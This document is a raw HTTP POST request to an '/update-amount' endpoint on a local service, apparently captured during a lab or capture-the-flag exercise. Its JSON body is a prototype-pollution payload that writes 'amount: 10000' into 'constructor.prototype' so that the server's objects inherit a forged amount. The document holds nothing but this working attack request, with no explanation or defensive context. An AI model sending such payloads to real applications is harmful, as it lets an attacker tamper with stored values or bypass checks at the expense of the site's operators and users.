POST /update-amount HTTP/1.1
Host: 127.0.0.1:29325
Content-Length: 147
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
accept: application/json
sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99"
content-type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Origin: http://127.0.0.1:29325
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:29325/
Accept-Encoding: gzip, deflate, br
Cookie: io=-ZNWD9FubQ3pw2mmAAC7
Connection: keep-alive

{
  "type": "set",
  "point": {
    "amount": null,
    "constructor": {
      "prototype": {
        "amount": 10000
      }
    }
  }
}